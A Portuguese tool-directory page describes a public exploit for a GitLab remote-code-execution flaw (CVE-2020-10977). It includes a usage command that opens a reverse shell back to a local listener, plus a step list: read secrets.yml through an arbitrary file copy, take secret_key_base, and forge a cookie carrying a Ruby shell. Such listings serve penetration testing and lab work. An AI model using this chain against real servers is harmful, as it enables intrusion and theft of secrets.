Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-10977 — Gitlab v12.4.0-8.1 RCE | Kitploit
Ferramentas/GitHubGitHub/liath/cve-2020-10977
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubliath/cve-2020-10977

CVE-2020-10977

Gitlab v12.4.0-8.1 RCE

Ver Repositório
212há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GitLab v12.4.0-12.8.1 RCE

Baseado inteiramente em https://github.com/dotPY-hax/gitlab_RCE, que não funcionou para mim e a parte de análise HTML parecia complicada, então eu reescrevi em JS.

Uso

Inicie um handler de reverse shell da maneira usual, então execute este script com:

root@kitploit:~
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
 TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
 LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
 node gitlab_rce.js

Um proxy pode ser especificado com TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080". Burp é particularmente útil para depuração com isso.

O que isso faz

  1. verifica se o alvo está ativo
  2. se o usuário fornecido existe, pule para 5
  3. procura por um nome de usuário que ainda não exista
  4. cria esse usuário
  5. tenta fazer login
  6. cria dois projetos vazios
  7. cria um novo ticket de issue com um link malicioso em seu corpo no primeiro projeto
  8. move o novo ticket para o outro projeto, fazendo com que o GitLab reescreva nosso link malicioso e copie o arquivo apontado para o diretório de uploads
  9. busca o arquivo alvo, neste caso queremos o secrets.yml para o secret_key_base
  10. usa o secret_key_base para criar um cookie malicioso com nosso shell Ruby e o passa para o GitLab
Baixar ferramenta